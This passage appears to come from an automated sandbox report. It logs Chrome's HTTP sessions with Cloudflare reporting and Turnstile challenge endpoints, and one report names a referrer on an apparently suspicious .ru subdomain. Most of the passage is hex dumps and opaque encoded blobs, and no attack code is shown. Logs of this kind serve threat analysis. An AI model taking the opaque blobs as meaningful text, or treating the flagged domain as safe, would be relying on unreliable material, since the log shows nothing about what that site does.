                                                Data Ascii: 5xKOmuq6motKlzorEzKaip9qa1JSalazVz5zO3cfZsMfd5unZxenOo++pr8HN8LXEwrbU9fn0/cq8+9zyvrnk/dvV6vvdz+sD8t3xBgzJ9A0S+Pf67vDdFPMQ+QMGJAcWIOvnIP0n7SMD8A0S8QkMJvI4Dikc9v4aHzYEICc3JToYNxUmHCpOJ0gwDSwySUkoPCwoXlVLWixVNF4wWTZYYlk2Vl5pSEtfU0tHd0lhcjJXWlhSUDpcQDs+YEN6Qm
                                                2024-05-30 10:20:47 UTC1369INData Raw: 7a 62 47 61 6a 71 79 4c 6a 4d 43 4b 70 73 58 59 6d 4b 72 62 32 62 69 54 7a 36 4b 77 70 62 37 6c 79 4c 58 42 34 65 6e 42 71 4e 33 72 78 38 33 51 36 64 2f 52 79 50 58 6d 79 64 69 31 32 37 69 2f 74 75 2f 42 30 2b 37 59 42 77 6e 61 77 4d 72 31 37 4d 54 69 35 75 4c 36 46 50 34 57 36 51 67 53 30 2b 34 4d 39 77 59 4c 32 4e 48 72 49 42 49 5a 49 52 6a 76 39 42 6b 4b 47 76 73 41 34 79 33 33 2f 41 6f 69 4b 41 38 66 4f 41 33 7a 44 79 77 79 4a 69 76 35 48 67 70 41 4d 6b 56 42 4f 42 68 49 51 54 34 34 43 30 63 67 4b 45 51 5a 43 30 59 51 55 6a 35 46 4c 78 51 5a 4d 79 73 6c 52 6a 64 61 59 53 39 67 4e 45 51 77 4a 7a 42 6a 5a 31 56 67 49 30 31 6b 5a 31 70 72 5a 6a 39 66 62 6c 68 71 51 56 68 75 64 33 70 70 56 30 74 69 4f 31 78 6b 5a 44 68 31 68 6d 42 42 61 57 57 4e 57 31 78
                                                Data Ascii: zbGajqyLjMCKpsXYmKrb2biTz6Kwpb7lyLXB4enBqN3rx83Q6d/RyPXmydi127i/tu/B0+7YBwnawMr17MTi5uL6FP4W6QgS0+4M9wYL2NHrIBIZIRjv9BkKGvsA4y33/AoiKA8fOA3zDywyJiv5HgpAMkVBOBhIQT44C0cgKEQZC0YQUj5FLxQZMyslRjdaYS9gNEQwJzBjZ1VgI01kZ1prZj9fblhqQVhud3ppV0tiO1xkZDh1hmBBaWWNW1x
                                                2024-05-30 10:20:47 UTC1369INData Raw: 4d 36 6e 71 39 6a 53 70 71 2f 63 31 71 6e 58 79 74 6d 73 32 61 48 67 74 4c 58 66 70 4c 66 74 36 50 43 76 78 36 76 53 72 4d 47 30 76 2b 4f 77 72 4c 76 6e 74 4c 44 32 36 37 69 30 41 67 58 36 32 4c 33 2b 32 2f 33 73 36 2b 72 46 44 73 62 75 42 41 59 50 36 4d 30 57 7a 76 58 6a 32 2f 6a 37 36 2b 63 63 2f 68 51 58 42 51 48 78 35 69 50 38 34 67 54 70 42 4f 59 62 42 51 76 39 45 51 6b 55 42 41 44 31 44 51 59 6e 47 52 51 77 2f 6a 77 66 4e 44 63 6c 49 52 49 48 51 78 38 6e 46 53 30 6f 4c 42 67 4e 4a 54 41 30 45 54 51 6a 56 67 38 74 4a 46 63 38 4e 69 70 54 4e 54 39 69 56 79 31 44 48 7a 41 6d 50 54 52 66 52 55 73 6d 62 69 64 50 50 69 78 4e 52 53 39 52 57 56 5a 46 4e 46 74 55 58 47 39 56 57 54 78 39 62 6b 51 35 66 30 5a 32 52 33 68 70 65 34 2b 4a 63 6c 42 46 55 49 2b 50
                                                Data Ascii: M6nq9jSpq/c1qnXytms2aHgtLXfpLft6PCvx6vSrMG0v+OwrLvntLD267i0AgX62L3+2/3s6+rFDsbuBAYP6M0WzvXj2/j76+cc/hQXBQHx5iP84gTpBOYbBQv9EQkUBAD1DQYnGRQw/jwfNDclIRIHQx8nFS0oLBgNJTA0ETQjVg8tJFc8NipTNT9iVy1DHzAmPTRfRUsmbidPPixNRS9RWVZFNFtUXG9VWTx9bkQ5f0Z2R3hpe4+JclBFUI+P


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.44975535.190.80.14434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:47 UTC532OUTOPTIONS /report/v4?s=IFfxEEvmd4bgv1rf9R0SUQesSlcBsdnMk0vaO8wl5VeKSAuB5bzqxCTNm4sZUsQA%2BYcYdivYdOBNPTUy3frQDVrngNbzCKpSy9qujj1nqbMQS9IrRLh7TvVAhmnExg%3D%3D HTTP/1.1
                                                Host: a.nel.cloudflare.com
                                                Connection: keep-alive
                                                Origin: https://f8gxf.oritelos.ru
                                                Access-Control-Request-Method: POST
                                                Access-Control-Request-Headers: content-type
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:47 UTC336INHTTP/1.1 200 OK
                                                content-length: 0
                                                access-control-max-age: 86400
                                                access-control-allow-methods: OPTIONS, POST
                                                access-control-allow-origin: *
                                                access-control-allow-headers: content-type, content-length
                                                date: Thu, 30 May 2024 10:20:47 GMT
                                                Via: 1.1 google
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.44975735.190.80.14434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:48 UTC472OUTPOST /report/v4?s=IFfxEEvmd4bgv1rf9R0SUQesSlcBsdnMk0vaO8wl5VeKSAuB5bzqxCTNm4sZUsQA%2BYcYdivYdOBNPTUy3frQDVrngNbzCKpSy9qujj1nqbMQS9IrRLh7TvVAhmnExg%3D%3D HTTP/1.1
                                                Host: a.nel.cloudflare.com
                                                Connection: keep-alive
                                                Content-Length: 430
                                                Content-Type: application/reports+json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:48 UTC430OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 66 38 67 78 66 2e 6f 72 69 74 65 6c 6f 73 2e 72 75 2f 68 49 7a 63 36 77 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22
                                                Data Ascii: [{"age":0,"body":{"elapsed_time":110,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://f8gxf.oritelos.ru/hIzc6w/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error"
                                                2024-05-30 10:20:48 UTC168INHTTP/1.1 200 OK
                                                content-length: 0
                                                date: Thu, 30 May 2024 10:20:47 GMT
                                                Via: 1.1 google
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.449758104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:49 UTC775OUTGET /cdn-cgi/challenge-platform/h/b/i/88bdfe512e5d4301/1717064447602/jhAXgwYP39WVSiq HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normal
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:49 UTC200INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:49 GMT
                                                Content-Type: image/png
                                                Content-Length: 61
                                                Connection: close
                                                Server: cloudflare
                                                CF-RAY: 88bdfe685caf19cf-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:49 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 62 00 00 00 61 08 02 00 00 00 a2 53 e3 f7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                Data Ascii: PNGIHDRbaSIDAT$IENDB`


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.449759104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:49 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:49 UTC375INHTTP/1.1 404 Not Found
                                                Date: Thu, 30 May 2024 10:20:49 GMT
                                                Content-Type: application/json
                                                Content-Length: 7
                                                Connection: close
                                                cf-chl-out: W0mpfwIt/ocEl4mh/VQEgA==$8DgnXjVCAj8XpkVHmfsW+g==
                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Server: cloudflare
                                                CF-RAY: 88bdfe689d4e432e-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:49 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                Data Ascii: invalid


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.449760104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:50 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/88bdfe512e5d4301/1717064447602/jhAXgwYP39WVSiq HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:51 UTC200INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:51 GMT
                                                Content-Type: image/png
                                                Content-Length: 61
                                                Connection: close
                                                Server: cloudflare
                                                CF-RAY: 88bdfe730c4d4251-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:51 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 62 00 00 00 61 08 02 00 00 00 a2 53 e3 f7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                Data Ascii: PNGIHDRbaSIDAT$IENDB`


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.449761104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:51 UTC804OUTGET /cdn-cgi/challenge-platform/h/b/pat/88bdfe512e5d4301/1717064447606/48c2e462596e41e6aece842ae2c08996563e372a9ba82b16283e4c2b9f90bbdc/IFmMzoC7W5cO3ct HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                Cache-Control: max-age=0
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normal
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:51 UTC143INHTTP/1.1 401 Unauthorized
                                                Date: Thu, 30 May 2024 10:20:51 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 1
                                                Connection: close
                                                2024-05-30 10:20:51 UTC1382INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 53 4d 4c 6b 59 6c 6c 75 51 65 61 75 7a 6f 51 71 34 73 43 4a 6c 6c 59 2d 4e 79 71 62 71 43 73 57 4b 44 35 4d 4b 35 2d 51 75 39 77 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gSMLkYlluQeauzoQq4sCJllY-NyqbqCsWKD5MK5-Qu9wAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                2024-05-30 10:20:51 UTC1INData Raw: 4a
                                                Data Ascii: J


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.449763104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:52 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1135982147:1717061463:XHQuHvT4Va6wHyLXdOitYbqFIsyDOYHyVnGn1136xl8/88bdfe512e5d4301/f67bea3da7e6db1 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                Content-Length: 30258
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Content-type: application/x-www-form-urlencoded
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                CF-Challenge: f67bea3da7e6db1
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://challenges.cloudflare.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normal
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:52 UTC16384OUTData Raw: 76 5f 38 38 62 64 66 65 35 31 32 65 35 64 34 33 30 31 3d 64 63 4a 61 46 41 55 70 34 41 34 6a 4a 41 65 6b 5a 6a 4a 61 4a 34 55 77 6b 47 55 2d 6b 58 6b 41 63 55 53 6b 52 61 7a 33 34 45 68 6b 4b 41 6b 45 43 61 45 32 76 6b 45 61 65 4a 45 48 6b 31 6a 41 36 43 6a 65 6b 62 61 25 32 62 41 57 4c 6b 64 4e 5a 72 37 34 61 55 63 55 67 50 61 31 77 32 6b 67 53 6f 32 6b 73 6b 6c 57 54 33 6b 4a 73 77 6a 43 75 6a 6b 45 65 46 6b 6c 34 55 58 6b 5a 4a 6b 66 6b 6c 2b 66 43 6b 55 53 61 55 69 6c 7a 61 6c 6b 33 5a 4c 7a 77 44 67 4a 75 4d 56 6c 6b 7a 24 38 42 6b 55 65 61 4c 73 45 4a 61 6b 4c 55 44 53 35 77 43 52 6c 6f 6b 54 65 4a 57 44 2b 65 6b 6b 71 66 67 61 55 45 5a 61 6a 41 61 31 4c 6b 65 2b 32 6f 6b 44 62 54 31 73 24 41 61 6c 37 42 72 34 6c 39 39 4b 2d 54 2d 64 24 55 6d 39 73
                                                Data Ascii: v_88bdfe512e5d4301=dcJaFAUp4A4jJAekZjJaJ4UwkGU-kXkAcUSkRaz34EhkKAkECaE2vkEaeJEHk1jA6Cjekba%2bAWLkdNZr74aUcUgPa1w2kgSo2ksklWT3kJswjCujkEeFkl4UXkZJkfkl+fCkUSaUilzalk3ZLzwDgJuMVlkz$8BkUeaLsEJakLUDS5wCRlokTeJWD+ekkqfgaUEZajAa1Lke+2okDbT1s$Aal7Br4l99K-T-d$Um9s
                                                2024-05-30 10:20:52 UTC13874OUTData Raw: 6e 6a 70 45 46 71 6c 6b 5a 6b 4d 61 31 59 6c 63 41 63 55 24 6b 67 56 38 43 31 6b 55 74 6b 66 47 6a 43 55 58 6b 50 6b 6c 24 2b 77 6b 4e 6b 45 4a 45 72 6b 68 53 36 4a 55 4a 6b 44 61 6a 6b 31 24 6b 68 72 36 34 55 43 6b 30 6b 6c 63 45 76 6b 66 61 41 59 6b 58 61 52 61 41 6b 41 39 74 6f 4f 55 42 55 42 43 2d 75 34 56 6b 34 61 43 61 31 6b 6b 57 51 52 30 52 41 6b 4b 74 50 75 2d 6b 6b 6d 74 32 6b 55 61 6b 4a 34 55 51 6c 4a 41 6f 61 30 4d 54 6b 55 6e 6b 59 6b 70 56 6b 43 55 4d 6b 31 56 6b 76 6b 4f 61 6c 72 6f 4a 6b 55 51 6a 34 41 70 6b 6c 61 55 6c 45 34 6b 48 6b 6c 4c 6b 71 6b 67 53 5a 4a 41 56 55 72 6b 4e 56 41 4a 55 5a 61 65 61 54 43 6b 51 63 36 59 55 61 6b 76 6b 70 59 41 68 6b 6a 61 36 6a 7a 62 6b 32 71 6b 51 41 43 6b 36 61 31 48 45 47 6b 4b 51 79 4a 6b 24 6b 63
                                                Data Ascii: njpEFqlkZkMa1YlcAcU$kgV8C1kUtkfGjCUXkPkl$+wkNkEJErkhS6JUJkDajk1$khr64UCk0klcEvkfaAYkXaRaAkA9toOUBUBC-u4Vk4aCa1kkWQR0RAkKtPu-kkmt2kUakJ4UQlJAoa0MTkUnkYkpVkCUMk1VkvkOalroJkUQj4ApklaUlE4kHklLkqkgSZJAVUrkNVAJUZaeaTCkQc6YUakvkpYAhkja6jzbk2qkQACk6a1HEGkKQyJk$kc
                                                2024-05-30 10:20:52 UTC322INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:52 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 22192
                                                Connection: close
                                                cf-chl-gen: Shwi5E+BIpDEpNtKrzQkpEOqo1k6FrrAjxbpfbkJopmPGqDpFJHBhKjs3rfRH2Pc$mJHxjOGIv1sYHxZYWcAg+A==
                                                Server: cloudflare
                                                CF-RAY: 88bdfe7bbf2b42e9-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:52 UTC1047INData Raw: 77 61 53 61 6d 61 4f 4b 74 62 6a 45 75 4c 32 2b 7a 73 4b 6c 7a 61 72 5a 79 63 37 62 31 70 62 53 33 39 75 34 77 64 72 66 7a 61 54 6b 6d 75 4c 6b 71 5a 37 70 78 63 33 6c 75 71 33 53 35 65 76 75 74 65 53 76 38 2b 53 31 75 62 54 71 39 64 32 30 31 51 47 37 42 4d 54 42 41 51 58 7a 41 64 62 4c 35 75 6f 4c 45 39 48 4b 41 64 4d 4b 35 39 6b 49 44 2b 30 4f 39 68 4d 58 36 74 6a 31 49 67 45 6b 35 4f 45 70 35 77 77 4c 42 79 77 48 43 79 73 30 38 65 59 71 44 69 6b 49 36 77 38 4f 4f 69 73 38 2b 79 45 36 48 6a 66 39 52 51 55 37 46 76 73 6e 51 42 34 59 4c 54 34 67 45 6c 46 48 4e 55 34 31 52 69 6f 33 45 55 34 73 55 6a 64 52 59 56 74 4c 49 68 74 48 4a 46 55 6a 58 6b 64 66 54 53 74 4c 59 56 46 4e 64 48 56 6e 56 30 52 54 4d 6b 4e 72 53 6d 6b 37 56 6b 78 66 54 34 52 4d 59 6c 68
                                                Data Ascii: waSamaOKtbjEuL2+zsKlzarZyc7b1pbS39u4wdrfzaTkmuLkqZ7pxc3luq3S5evuteSv8+S1ubTq9d201QG7BMTBAQXzAdbL5uoLE9HKAdMK59kID+0O9hMX6tj1IgEk5OEp5wwLBywHCys08eYqDikI6w8OOis8+yE6Hjf9RQU7FvsnQB4YLT4gElFHNU41Rio3EU4sUjdRYVtLIhtHJFUjXkdfTStLYVFNdHVnV0RTMkNrSmk7VkxfT4RMYlh
                                                2024-05-30 10:20:52 UTC1369INData Raw: 61 33 4e 66 53 6c 64 2f 4a 77 5a 79 6b 35 75 62 6b 6e 71 57 32 35 38 7a 47 6f 4e 33 6d 7a 4c 32 38 34 65 6e 43 35 4f 2f 34 30 75 57 35 35 62 44 57 79 63 48 76 41 2b 2f 78 41 2f 76 53 42 75 58 4c 44 51 6f 44 78 51 7a 35 38 76 48 55 2f 52 63 47 44 2b 37 54 34 78 50 34 36 65 67 4c 41 65 37 73 41 66 76 79 2f 42 72 6c 38 76 51 4a 43 2f 76 34 44 51 67 64 45 41 51 4b 4c 77 73 47 49 69 63 70 4d 42 73 63 2f 54 72 36 4c 53 45 38 41 6b 45 6c 2b 68 49 66 4f 79 30 6d 42 68 70 46 45 6c 42 56 4a 6b 4a 56 46 67 38 6f 57 54 77 74 54 44 4a 67 57 55 38 62 49 54 39 4f 48 54 35 69 56 79 73 6b 4f 6d 42 61 58 32 42 4d 61 55 59 6e 62 6c 4a 44 63 7a 68 59 4d 31 68 37 55 31 39 56 67 6c 70 50 59 54 39 52 68 6e 39 4a 58 59 71 45 58 47 47 4f 69 46 39 6c 6b 6f 78 6c 61 5a 61 51 5a 47
                                                Data Ascii: a3NfSld/JwZyk5ubknqW258zGoN3mzL284enC5O/40uW55bDWycHvA+/xA/vSBuXLDQoDxQz58vHU/RcGD+7T4xP46egLAe7sAfvy/Brl8vQJC/v4DQgdEAQKLwsGIicpMBsc/Tr6LSE8AkEl+hIfOy0mBhpFElBVJkJVFg8oWTwtTDJgWU8bIT9OHT5iVyskOmBaX2BMaUYnblJDczhYM1h7U19VglpPYT9Rhn9JXYqEXGGOiF9lkoxlaZaQZG
                                                2024-05-30 10:20:52 UTC1369INData Raw: 77 72 47 6b 33 62 50 6a 76 4d 57 31 76 71 7a 75 78 61 66 4e 76 4d 69 74 74 4c 54 6c 79 38 6a 61 7a 66 7a 70 30 72 61 2f 36 4c 50 51 32 4f 33 69 76 64 72 38 78 66 4d 4e 39 77 2f 69 41 51 76 4b 35 2b 34 47 42 75 54 34 36 4f 51 62 45 76 30 58 36 42 4c 38 47 2b 77 57 44 78 2f 77 47 76 67 6a 39 42 37 36 48 53 63 65 2b 68 73 6a 4c 67 30 51 4a 42 67 51 44 44 77 47 4d 54 38 4b 48 2f 6f 64 41 68 48 2b 49 51 55 42 49 6b 51 6d 41 77 59 32 4c 68 34 52 53 67 56 42 50 68 59 52 4c 43 46 58 4c 78 5a 4c 46 7a 56 63 4d 55 4e 56 55 6a 77 34 56 56 78 6a 50 45 4e 55 4f 32 59 33 51 57 31 45 63 6a 31 47 4e 6d 55 33 63 6b 34 34 5a 56 46 54 62 47 74 59 67 47 4a 76 58 49 4e 6d 63 32 43 45 61 6e 64 6b 68 32 35 37 61 45 70 79 66 32 78 51 65 47 61 59 63 58 5a 39 6c 49 69 49 57 5a 70
                                                Data Ascii: wrGk3bPjvMW1vqzuxafNvMittLTly8jazfzp0ra/6LPQ2O3ivdr8xfMN9w/iAQvK5+4GBuT46OQbEv0X6BL8G+wWDx/wGvgj9B76HSce+hsjLg0QJBgQDDwGMT8KH/odAhH+IQUBIkQmAwY2Lh4RSgVBPhYRLCFXLxZLFzVcMUNVUjw4VVxjPENUO2Y3QW1Ecj1GNmU3ck44ZVFTbGtYgGJvXINmc2CEandkh257aEpyf2xQeGaYcXZ9lIiIWZp
                                                2024-05-30 10:20:52 UTC1369INData Raw: 2b 48 6b 76 75 43 70 70 75 6a 6b 32 2b 75 37 71 71 76 73 74 61 37 57 2b 4c 4b 34 38 62 6e 75 41 66 32 36 79 37 6f 46 30 39 2b 2f 79 4e 4d 43 35 51 6a 70 78 73 6f 4d 35 41 4d 4a 37 4d 38 4c 31 42 63 44 43 2f 50 62 31 78 30 61 37 42 73 66 4a 69 50 69 34 77 72 6e 46 2b 63 4f 36 52 7a 71 2b 67 38 6d 41 79 7a 72 4b 67 67 77 47 69 73 7a 4a 52 73 73 2b 78 73 66 4d 52 52 45 2b 7a 6f 5a 4d 53 64 45 54 52 6f 48 4a 42 74 44 43 69 30 69 53 68 59 67 4d 31 52 47 49 78 6f 50 48 56 34 77 4d 55 4d 68 57 6c 38 2f 52 30 5a 46 52 45 64 6a 59 57 74 6e 62 32 52 4d 51 6d 59 78 53 47 4d 71 4f 48 74 6d 56 32 63 37 55 57 74 67 56 33 42 59 5a 6c 4a 76 65 6b 6c 66 52 47 70 67 61 30 61 48 63 56 78 53 63 59 78 57 63 34 2b 58 69 34 36 45 6e 70 74 30 6c 59 47 51 65 6d 2b 54 58 6d 4b 58
                                                Data Ascii: +HkvuCppujk2+u7qqvsta7W+LK48bnuAf26y7oF09+/yNMC5QjpxsoM5AMJ7M8L1BcDC/Pb1x0a7BsfJiPi4wrnF+cO6Rzq+g8mAyzrKggwGiszJRss+xsfMRRE+zoZMSdETRoHJBtDCi0iShYgM1RGIxoPHV4wMUMhWl8/R0ZFREdjYWtnb2RMQmYxSGMqOHtmV2c7UWtgV3BYZlJveklfRGpga0aHcVxScYxWc4+Xi46Enpt0lYGQem+TXmKX
                                                2024-05-30 10:20:52 UTC1369INData Raw: 47 70 32 71 6a 41 36 2b 4c 66 73 50 57 76 78 75 72 45 32 4c 6a 6f 2f 65 76 36 2b 38 2f 45 32 64 48 44 36 76 37 67 42 4f 37 33 79 41 34 4f 30 73 6e 76 7a 74 37 71 31 67 51 55 2f 4e 4c 50 2f 42 50 67 48 77 73 6a 37 2b 4c 75 2f 4f 4d 41 4b 42 63 74 4b 43 55 48 4d 68 38 76 43 77 76 75 4e 41 73 68 39 42 73 72 4d 52 67 48 2f 6a 6b 51 4b 30 49 38 45 78 6c 47 51 42 6b 64 53 6b 51 59 49 55 35 49 47 30 6b 38 53 78 35 4c 45 31 49 6d 4a 31 45 57 4b 56 39 61 58 7a 70 42 47 30 52 44 4d 79 59 78 56 53 49 65 4c 56 6b 6d 49 6d 68 64 4b 69 5a 30 59 53 34 75 57 46 4e 5a 62 30 56 52 63 47 35 71 63 54 55 36 55 6e 56 31 59 57 53 43 52 48 64 37 64 6d 36 45 55 59 74 52 6b 59 4a 4e 56 34 5a 6a 54 46 56 75 6b 59 64 52 69 6d 75 63 65 6f 42 78 6a 35 79 69 70 36 46 35 6a 5a 36 57 6a
